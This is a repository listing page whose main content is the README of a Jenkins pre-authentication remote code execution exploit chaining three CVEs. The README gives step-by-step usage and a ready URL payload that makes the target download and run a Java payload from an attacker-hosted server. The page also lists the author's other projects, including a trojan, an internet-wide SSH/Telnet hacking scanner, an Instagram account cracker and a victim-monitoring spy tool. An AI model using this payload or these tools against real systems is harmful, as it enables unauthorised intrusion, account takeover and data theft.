There are no reviews yet. Be the first to send feedback to the community and the maintainers!
JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION --------------------------------------------- Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw). It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution! Read his write-ups on this exploit here - Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html His github: https://github.com/orangetw INSTRUCTIONS: ------------- - Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder. - Once that is finished, copy the inner contents of www/ to a webserver. - In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files. URL Payload: ------------ http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a @Grab(group='package', module='payload', version='1')%0a import Payload;
Emotion
😄 Recognizes human faces and their corresponding emotions from a video or webcam feed. Powered by OpenCV and Deep Learning.Pine
🌲 Aimbot powered by real-time object detection with neural networks, GPU accelerated with Nvidia. Optimized for use with CS:GO.GoAT
🐐 GoAT (Golang Advanced Trojan) is a trojan that uses Twitter as a C&C servertts
📝 🔉 A simple text-to-speech tool. Converts your text to speech with any of StreamElements voices. Frontend built with Gatsby.Knock
🔑 Scan the entire internet for SSH and Telnet services. Then hack them.Pad
📓 An online, collaborative, real-time notepad built with WebSockets and NodeJSbandcamp-ripper
🎵 Rips MP3 files from Bandcamp album URL'sDonut
🤖 A JavaScript implementation of the infamous "donut.c" programA-picture-of-Jeff-Goldblum
💯 This repository is a picture of Jeff GoldblumWizardli
🚀 An ultra fast YouTube-to-MP3 downloader and transcoderMusicalFractals
✨ Generates 3D, animated fractals by analyzing the waveform of audio filesBitBuster
🔑 Multi-threaded Instagram account crackerBoilerChat
🎒 BoilerChat is a live, anonymous, online chatroom for Purdue students.WhoHackedMe
🔍 Instantly search the web for hacked data. Check if you appear in any database leaks.react-bootstrap-webpack-Boilerplate
Start any web project with ease by using this React, Webpack, Bootstrap, and Babel boilerplate!resume
Thank you kanye, very cool!Reverb
🔥 An audio visualizer built on the Web Audio APInetpaste
A command line pastebin accessible through netcatlivespy
LiveSpy monitors a victims computer and sends sensitive information to the hacker. Written with Go and Websockets.VaporwaveText
A simple React app to convert "normal text" to "vaporwave text"string2bf
Converts a string to Brainf**k codeTransform
An HTML5 game that challenges the mind!Boilermake2018
Boilermake 2018 hackathon repoAimbotCalvin
Website for TSM Aimbot Calvinsuperkey
CODE39 brute forcerdraw.io
dingus
Vidya gameyf-downloader
Export data from Yahoo Finance to Excel spreadsheetsRedditBrowser
A simple full screen image and video browser for Redditsudoku-solver
A simple sudoku solver written in GoPyScrape
A super fast web crawling (slithering?) email scraper written entirely in Python.Love Open Source and this site? Check out how you can help us